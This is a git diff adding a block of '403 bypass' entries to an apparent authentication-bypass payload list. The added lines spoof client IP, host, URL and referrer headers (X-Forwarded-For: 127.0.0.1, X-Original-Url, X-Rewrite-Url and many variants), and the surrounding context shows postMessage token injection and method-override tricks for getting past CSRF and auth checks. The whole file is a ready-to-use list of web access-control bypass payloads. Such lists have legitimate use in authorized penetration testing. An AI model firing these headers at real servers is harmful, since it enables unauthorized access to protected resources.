diff --git a/Authentication-Bypass/auth-bypass-payloads.txt b/Authentication-Bypass/auth-bypass-payloads.txt
index 11dcfb6..1d9f8d8 100644
--- a/Authentication-Bypass/auth-bypass-payloads.txt
+++ b/Authentication-Bypass/auth-bypass-payloads.txt
@@ -451,3 +451,54 @@ postMessage({type:'auth',token:'admin_token'}, '*')
 X-HTTP-Method-Override: GET
 X-Method-Override: GET
 # Change POST to GET to bypass CSRF and auth checks
+
+# ============================================
+# 403 BYPASS HEADERS
+# ============================================
+
+# IP spoofing / access control bypass headers
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-For-Original: 127.0.0.1
+X-Forward-For: 127.0.0.1
+X-Forwarder-For: 127.0.0.1
+X-Forwarded: 127.0.0.1
+X-Forwarded-By: 127.0.0.1
+X-Forwarded-Host: 127.0.0.1
+X-Forwarded-Server: 127.0.0.1
+X-Forwarded-Scheme: https
+X-Forwarded-Scheme: http
+X-Forwarded-Port: 80
+X-Forwarded-Port: 443
+X-Forwarded-Port: 8080
+X-Forwarded-Port: 8443
+X-Client-IP: 127.0.0.1
+X-Real-Ip: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+X-Original-Remote-Addr: 127.0.0.1
+X-Originating-IP: 127.0.0.1
+X-True-IP: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+Client-IP: 127.0.0.1
+Real-Ip: 127.0.0.1
+
+# URL / host override headers
+X-Original-Url: 127.0.0.1
+X-Rewrite-Url: 127.0.0.1
+X-Http-Host-Override: 127.0.0.1
+X-Http-Destinationurl: 127.0.0.1
+X-Host: 127.0.0.1
+X-Proxy-Url: 127.0.0.1
+Proxy-Url: 127.0.0.1
+Proxy-Host: 127.0.0.1
+Http-Url: 127.0.0.1
+Base-Url: 127.0.0.1
+Url: 127.0.0.1
+Uri: 127.0.0.1
+Request-Uri: 127.0.0.1
+Redirect: 127.0.0.1
+
+# Referer / referrer spoofing
+Referer: 127.0.0.1
+Referrer: 127.0.0.1
+Refferer: 127.0.0.1